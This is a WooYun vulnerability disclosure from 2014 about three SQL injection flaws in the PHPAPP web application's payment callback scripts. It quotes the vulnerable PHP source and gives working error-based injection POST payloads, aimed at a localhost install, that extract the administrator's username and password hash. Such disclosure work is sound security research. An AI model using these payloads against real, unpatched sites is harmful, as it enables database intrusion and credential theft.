当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-055604

漏洞标题:PHPAPP网站应用系统SQL注入1

相关厂商:PHPAPP

漏洞作者: xfkxfk

提交时间:2014-04-09 16:21

修复时间:2014-07-09 10:16

公开时间:2014-07-09 10:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-07-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

PHPAPP 全球领先的网站应用系统。
PHPAPP 全球网站应用的开创者,独创系统核心长期提供丰富网站应用程序,专为站长企业打造盈利应用。

详细说明:

第一个漏洞:
PHPAPP网站应用系统官方最新版SQL注入
程序官网:http://www.phpapp.cn/index.html
在文件/api/chinabank/receive.php中:

<?
include('../../api.php');
$key=PHPAPP::$config['chinabankkey'];                   //登陆后在上面的导航栏里可能找到“资料管理”,在资料管理的二级导航栏里有“MD5密钥设置” 
$v_oid     =trim($_POST['v_oid']);       // 商户发送的v_oid定单编号   
$v_pmode   =trim($_POST['v_pmode']);    // 支付方式(字符串)   
$v_pstatus =trim($_POST['v_pstatus']);   //  支付状态 :20(支付成功);30(支付失败)
$v_pstring =trim($_POST['v_pstring']);   // 支付结果信息 : 支付完成(当v_pstatus=20时);失败原因(当v_pstatus=30时,字符串); 
$v_amount  =trim($_POST['v_amount']);     // 订单实际支付金额
$v_moneytype  =trim($_POST['v_moneytype']); //订单实际支付币种    
$remark1   =trim($_POST['remark1']);      //备注字段1
$remark2   =trim($_POST['remark2']);     //备注字段2
$v_md5str  =trim($_POST['v_md5str']);   //拼凑后的MD5校验值        
$md5string=strtoupper(md5($v_oid.$v_pstatus.$v_amount.$v_moneytype.$key));
@include_once(APPS.'/pay/class/pay_class_phpapp.php');
$pay=new PayMoney();
                        
if($v_md5str==$md5string){
        
                if($v_pstatus=="20"){
                         $pay->SetPayMoney($v_oid,$v_amount,'ChinaBank');
                         
                }else{
                         $pay->PayError();
                }
}else{
            $pay->PayError();
}
?>


从上面看出:
当$v_md5str==$md5string,也就是就将我们输入的参数都md5一下,并且$v_pstatus=="20",即返回状态为20时,
进入SetPayMoney操作,

public function SetPayMoney($order,$paymoney=0,$payname=''){
        //if($this->uid >0){
                  
                                  if($this->IsSQL('consume'," WHERE  serial='$order' AND amount='$paymoney'")){
                                                //$this->Refresh('该订单已支付过了',SURL);
                                                         $this->Refresh('充值成功!',SURL.'/member.php?app=5');
}else{
                                                        
                                                  if($this->IsSQL('pay'," WHERE payorder='$order' AND paymoney='$paymoney'")){
$payname=$this->str($payname,26,1,0,1,0,1);
                                                                  
                                                                  $apps=$this->GetMysqlOne('id_phpapp,name_phpapp'," ".$this->GetTable('apps')." WHERE class_phpapp='$payname'");
                                                                  
                                                                  $payarray=$this->GetMysqlOne('payuid'," ".$this->GetTable('pay')." WHERE payorder='$order' AND paymoney='$paymoney' ");
                                                                 
                                                                  //记录
                                                                  include_once(APPS.'/apppay/class/consume_class_phpapp.php');
                
                                                                  $pay=new UserConsume();
                                                                  
                                                                  $newcid=$pay->MakeConsume(array(
                                                        'subject'=>'<p>充值</p>'.$apps['name_phpapp'],  
                                                                                                                  'appid'=>$apps['id_phpapp'], 
                                                                                                                  'serial'=>$order, 
                                                                                                                  'paytype'=>3, 
                                                                                                                  'process'=>1, 
                                                                                                                  'amount'=>$paymoney, 
                                                                                                                  'payout'=>0, 
                                                                                                                  'payin'=>$payarray['payuid']
                                                ));
                                                        $pay->SetSuccessConsume($newcid); 
                                                                  
                                                                  //$this->Delete('pay'," WHERE payorder='$order' AND paymoney='$paymoney' AND payuid='$this->uid' ");
                                                                  
                                                                  $this->Refresh('充值成功!',SURL.'/member.php?app=5');
                                                  }else{
                                                $this->Refresh('该订单不存在或已关闭!',SURL);
                        
                                                  }
                                  }
                                  //}else{
                             // $this->Refresh($this->LanguageArray('phpapp','Please_login_actions'),SURL);//}
                            }


直接进入SQL查询,导致SQL注入。
第二个漏洞:
PHPAPP网站应用系统官方最新版SQL注入
程序官网:http://www.phpapp.cn/index.html
在文件/api/alipay/notify_url.php中:

<?php
include('../../api.php');
$app=empty($_GET['app']) ? 0 : intval($_GET['app']);
 $lang=empty($_GET['lang']) ? 1 : intval($_GET['lang']);
        @require_once(APPS.'/alipay/alipay_config.php');
            @require_once(APPS.'/alipay/class/alipay_notify.php');
                        
                @$alipay = new alipay_notify($partner,$key,$sign_type,$_input_charset,$transport);  
                        @$verify_result = $alipay->notify_verify();  
                        
                        @include_once(APPS.'/pay/class/pay_class_phpapp.php');
                        $pay=new PayMoney();
        
                        if($verify_result){
                                
                                  //验证成功
                                  $dingdan           = $_POST['out_trade_no'];      //获取支付宝传递过来的订单号
                                  $total             = $_POST['total_fee'];                     //获取支付宝传递过来的总价格
                                                
                                  if($_POST['trade_status'] == 'TRADE_FINISHED' || $_POST['trade_status'] == 'TRADE_SUCCESS') {    
        $pay->SetPayMoney($dingdan,$total,'Alipay');
}else { 
                                          $pay->PayError();
                          
                                  }
                        
                        }else {
                                   $pay->PayError();
                                
                        }
?>


能看出当验证成功时,进入SetPayMoney操作:

public function SetPayMoney($order,$paymoney=0,$payname=''){
        //if($this->uid >0){
                  
                                  if($this->IsSQL('consume'," WHERE  serial='$order' AND amount='$paymoney'")){
                                                //$this->Refresh('该订单已支付过了',SURL);
                                                         $this->Refresh('充值成功!',SURL.'/member.php?app=5');
}else{
                                                        
                                                  if($this->IsSQL('pay'," WHERE payorder='$order' AND paymoney='$paymoney'")){
$payname=$this->str($payname,26,1,0,1,0,1);
                                                                  
                                                                  $apps=$this->GetMysqlOne('id_phpapp,name_phpapp'," ".$this->GetTable('apps')." WHERE class_phpapp='$payname'");
                                                                  
                                                                  $payarray=$this->GetMysqlOne('payuid'," ".$this->GetTable('pay')." WHERE payorder='$order' AND paymoney='$paymoney' ");
                                                                 
                                                                  //记录
                                                                  include_once(APPS.'/apppay/class/consume_class_phpapp.php');
                
                                                                  $pay=new UserConsume();
                                                                  
                                                                  $newcid=$pay->MakeConsume(array(
                                                        'subject'=>'<p>充值</p>'.$apps['name_phpapp'],  
                                                                                                                  'appid'=>$apps['id_phpapp'], 
                                                                                                                  'serial'=>$order, 
                                                                                                                  'paytype'=>3, 
                                                                                                                  'process'=>1, 
                                                                                                                  'amount'=>$paymoney, 
                                                                                                                  'payout'=>0, 
                                                                                                                  'payin'=>$payarray['payuid']
                                                ));
                                                        $pay->SetSuccessConsume($newcid); 
                                                                  
                                                                  //$this->Delete('pay'," WHERE payorder='$order' AND paymoney='$paymoney' AND payuid='$this->uid' ");
                                                                  
                                                                  $this->Refresh('充值成功!',SURL.'/member.php?app=5');
                                                  }else{
                                                $this->Refresh('该订单不存在或已关闭!',SURL);
                        
                                                  }
                                  }
                                  //}else{
                             // $this->Refresh($this->LanguageArray('phpapp','Please_login_actions'),SURL);//}
                            }


这里是验证支付宝返回是否成功。
由于需要支付宝的接口配置,在正常环境下,此功能都是可用的。
这里我们假设返回验证成功了。
@$verify_result = $alipay->notify_verify() ? true : true;
第三个漏洞:
PHPAPP网站应用系统官方最新版SQL注入
程序官网:http://www.phpapp.cn/index.html
在文件/api/chinabank/AutoReceive.php中:

$key=PHPAPP::$config['chinabankkey'];                   //登陆后在上面的导航栏里可能找到“资料管理”,在资料管理的二级导航栏里有“MD5密钥设置” 
$v_oid     =trim($_POST['v_oid']);       // 商户发送的v_oid定单编号   
$v_pmode   =trim($_POST['v_pmode']);    // 支付方式(字符串)   
$v_pstatus =trim($_POST['v_pstatus']);   //  支付状态 :20(支付成功);30(支付失败)
$v_pstring =trim($_POST['v_pstring']);   // 支付结果信息 : 支付完成(当v_pstatus=20时);失败原因(当v_pstatus=30时,字符串); 
$v_amount  =trim($_POST['v_amount']);     // 订单实际支付金额
$v_moneytype  =trim($_POST['v_moneytype']); //订单实际支付币种    
$remark1   =trim($_POST['remark1']);      //备注字段1
$remark2   =trim($_POST['remark2']);     //备注字段2
$v_md5str  =trim($_POST['v_md5str']);   //拼凑后的MD5校验值        
$md5string=strtoupper(md5($v_oid.$v_pstatus.$v_amount.$v_moneytype.$key));
@include_once(APPS.'/pay/class/pay_class_phpapp.php');
$pay=new PayMoney();
                        
                        
if($v_md5str==$md5string){
        
                if($v_pstatus=="20"){
                         $pay->SetPayMoney($v_oid,$v_amount,'ChinaBankPay');
                         
                }else{
                         $pay->PayError();
                }
}else{
            $pay->PayError();
}


这里直接获取POST过来的参数,并没有过滤
也没有判断访问权限,所以无需登录,可以直接访问。
而且这里的$key是默认为空。
当满足条件时就会进行SetPayMoney操作,我们来看看此函数:

public function SetPayMoney($order,$paymoney=0,$payname=''){
           
                  //if($this->uid >0){
                  
                                  if($this->IsSQL('consume'," WHERE  serial='$order' AND amount='$paymoney'")){
                                                         //$this->Refresh('该订单已支付过了',SURL);
                                                         $this->Refresh('充值成功!',SURL.'/member.php?app=5');
                                  }else{
                                                        
                                                  if($this->IsSQL('pay'," WHERE payorder='$order' AND paymoney='$paymoney'")){
                                                                  $payname=$this->str($payname,26,1,0,1,0,1);
                                                                  
                                                                  $apps=$this->GetMysqlOne('id_phpapp,name_phpapp'," ".$this->GetTable('apps')." WHERE class_phpapp='$payname'");
                                                                  
                                                                  $payarray=$this->GetMysqlOne('payuid'," ".$this->GetTable('pay')." WHERE payorder='$order' AND paymoney='$paymoney' ");
                                                                  //记录
                                                                  include_once(APPS.'/apppay/class/consume_class_phpapp.php');
                
                                                                  $pay=new UserConsume();
                                                                  $newcid=$pay->MakeConsume(array(
                                                                                                                  'subject'=>'<p>充值</p>'.$apps['name_phpapp'],  
                                                                                                                  'appid'=>$apps['id_phpapp'], 
                                                                                                                  'serial'=>$order, 
                                                                                                                  'paytype'=>3, 
                                                                                                                  'process'=>1, 
                                                                                                                  'amount'=>$paymoney, 
                                                                                                                  'payout'=>0, 
                                                                                                                  'payin'=>$payarray['payuid']
                                                                                                        ));
                                                                  $pay->SetSuccessConsume($newcid); 
                                                                  
                                                                  //$this->Delete('pay'," WHERE payorder='$order' AND paymoney='$paymoney' AND payuid='$this->uid' ");
                                                                  
                                                                  $this->Refresh('充值成功!',SURL.'/member.php?app=5');
                                                  }else{
                                                                $this->Refresh('该订单不存在或已关闭!',SURL);     
                                                  }
                                  }
         }


$order,$paymoney参数直接进入SQL语句,导致SQL注入。

漏洞证明:

第一个漏洞证明:
发送请求:
连接:
http://localhost/phpapp/api/Chinabank/receive.php
POST:
v_oid=yu' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,password) from phpapp_member limit 0,1))a from information_schema.tables group by a)b) and 1=1#&v_pstatus=20&v_md5str=043B304ECA76E89F9A44DE11A0D3D03C
即可爆出管理员账户:

a.png


第二个漏洞证明:
这里是验证支付宝返回是否成功。
由于需要支付宝的接口配置,在正常环境下,此功能都是可用的。
这里我们假设返回验证成功了。
@$verify_result = $alipay->notify_verify() ? true : true;
发送请求:
连接:
http://localhost/phpapp/api/alipay/notify_url.php
POST:
out_trade_no=123' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,password) from phpapp_member limit 0,1))a from information_schema.tables group by a)b) and 1=1#&total_fee=123&trade_status=TRADE_SUCCESS
成功爆出管理员账户:

b.png


第三个漏洞证明:
发送请求:
连接:
http://localhost/phpapp/api/Chinabank/autoreceive.php
POST:
v_oid=123' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,password) from phpapp_member limit 0,1))a from information_schema.tables group by a)b) and 1=1#&v_pstatus=20&v_amount=&v_moneytype=&v_md5str=BBDDD3F7BDE73D3519A838E71F75385F
这里的v_md5str的值必须是前面你所提交的所有参数的md5值。
如图,成功爆出管理员账户用户名密码。

c.png

修复方案:

加强过滤,对参数v_oid进行过滤处理。

版权声明:转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝